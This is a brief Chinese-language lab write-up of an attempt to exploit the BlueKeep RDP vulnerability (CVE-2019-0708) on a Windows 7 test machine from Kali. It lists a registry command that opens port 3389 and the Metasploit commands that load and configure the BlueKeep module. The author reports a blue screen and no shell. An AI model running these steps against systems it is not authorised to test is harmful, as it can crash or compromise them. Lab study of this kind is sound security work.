準備工作
靶機:win 7 ip:192.168.128.128 開放3389端口
攻擊機:kali2 ip:192.168.128.129
實際操作
對靶機進行開放3389
在cmd内輸入
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
使用netstat 檢視端口開放情況
在kali裡開啟msf
輸入msfconsole
如果沒有找到建議更新一下軟體
apt-get install metasploit-framework
查找exp 輸入
search 0708
使用 exp 輸入
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
使用
show options
檢視主要參數
使用
show targets
檢視攻擊目标
設定參數
set rhost 192.168.128.128
set target 3
運作結果
靶機直接藍屏
最後
不知怎的就是不能擷取道shell,查閱資料設定
set forceexploit true
還是不能得到shell